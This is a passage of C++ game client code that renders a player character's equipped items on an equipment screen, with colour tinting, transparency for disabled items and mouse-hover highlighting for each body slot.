			else if (cCollison == DEF_EQUIPPOS_LFINGER)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 90, sY + 175, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_NECK)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 35, sY + 120, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_TWOHAND)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 57, sY + 186, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_RHAND)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 57, sY + 186, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_LHAND)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 90, sY + 170, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_BODY)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_FULLBODY)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_BOOTS)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_ARMS)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_PANTS)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_BACK)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH]->PutTransSprite(sX + 41, sY + 137, sFrame, m_dwCurTime);
		}
	}
	else if ((m_sPlayerType >= 4) && (m_sPlayerType <= 6))
	{
		cCollison = -1;
		m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 40]->PutSpriteFast(sX + 171, sY + 290, m_sPlayerType - 4, m_dwCurTime);

		if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] == -1)
		{
			_GetHairColorRGB(((m_sPlayerAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
			m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 18 + 40]->PutSpriteRGB(sX + 171, sY + 290, (m_sPlayerAppr1 & 0x0F00) >> 8, iR, iG, iB, m_dwCurTime);
		}

		m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + 19 + 40]->PutSpriteFast(sX + 171, sY + 290, (m_sPlayerAppr1 & 0x000F), m_dwCurTime);

		if ((cEquipPoiStatus[DEF_EQUIPPOS_PANTS] != -1))
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSpriteFrame;
			if ((sSprH == 12) && (sFrame == 0)) iSkirtDraw = 1;
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_BACK] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BACK]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_BACK]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 45, sY + 143, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 45, sY + 143, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 45, sY + 143, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 45, sY + 143, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 45, sY + 143, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_BACK;
		}

		if ((cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1) && (iSkirtDraw == 1))
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_BOOTS;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_PANTS] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_PANTS]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_PANTS;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_ARMS] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_ARMS]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_ARMS;
		}

		if ((cEquipPoiStatus[DEF_EQUIPPOS_BOOTS] != -1) && (iSkirtDraw == 0))
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_BOOTS]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_BOOTS;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_BODY] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_BODY]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_BODY]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_BODY;
		}
		if (cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_FULLBODY]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 171, sY + 290, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 171, sY + 290, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 171, sY + 290, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_FULLBODY;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_LHAND] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_LHAND]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 84, sY + 175, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 84, sY + 175, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 84, sY + 175, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 84, sY + 175, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 84, sY + 175, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_LHAND;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_RHAND] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]]->m_cItemColor;
			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_RHAND]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 60, sY + 191, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 60, sY + 191, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 60, sY + 191, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 60, sY + 191, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 60, sY + 191, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_RHAND;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]]->m_cItemColor;
			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_TWOHAND]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 60, sY + 191, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 60, sY + 191, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 60, sY + 191, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 60, sY + 191, sFrame, m_wWR[cItemColor] - m_wR[0], m_wWG[cItemColor] - m_wG[0], m_wWB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 60, sY + 191, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_TWOHAND;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_NECK] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_NECK]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_NECK]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 35, sY + 120, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 35, sY + 120, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 35, sY + 120, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 35, sY + 120, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 35, sY + 120, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_NECK;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_RFINGER] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_RFINGER]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 32, sY + 193, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 32, sY + 193, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 32, sY + 193, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 32, sY + 193, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 32, sY + 193, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_RFINGER;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_LFINGER] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_LFINGER]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 90, sY + 175, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 90, sY + 175, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 90, sY + 175, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 90, sY + 175, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 90, sY + 175, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_LFINGER;
		}

		if (cEquipPoiStatus[DEF_EQUIPPOS_HEAD] != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_sSpriteFrame;
			cItemColor = m_pItemList[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]]->m_cItemColor;

			if (m_bIsItemDisabled[cEquipPoiStatus[DEF_EQUIPPOS_HEAD]] == FALSE)
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteFast(sX + 72, sY + 139, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutSpriteRGB(sX + 72, sY + 139, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			else
			{
				if (cItemColor == 0)
					m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite2(sX + 72, sY + 139, sFrame, m_dwCurTime);
				else m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSpriteRGB(sX + 72, sY + 139, sFrame, m_wR[cItemColor] - m_wR[0], m_wG[cItemColor] - m_wG[0], m_wB[cItemColor] - m_wB[0], m_dwCurTime);
			}
			if (m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->_bCheckCollison(sX + 72, sY + 139, sFrame, msX, msY))
				cCollison = DEF_EQUIPPOS_HEAD;
		}
		if (cCollison != -1)
		{
			sSprH = m_pItemList[cEquipPoiStatus[cCollison]]->m_sSprite;
			sFrame = m_pItemList[cEquipPoiStatus[cCollison]]->m_sSpriteFrame;
			if (cCollison == DEF_EQUIPPOS_HEAD)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 72, sY + 139, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_RFINGER)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 32, sY + 193, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_LFINGER)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 90, sY + 175, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_NECK)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 35, sY + 120, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_TWOHAND)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 60, sY + 191, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_RHAND)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 60, sY + 191, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_LHAND)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 84, sY + 175, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_BODY)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_FULLBODY)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
			else if (cCollison == DEF_EQUIPPOS_BOOTS)
				m_pSprite[DEF_SPRID_ITEMEQUIP_PIVOTPOINT + sSprH + 40]->PutTransSprite(sX + 171, sY + 290, sFrame, m_dwCurTime);
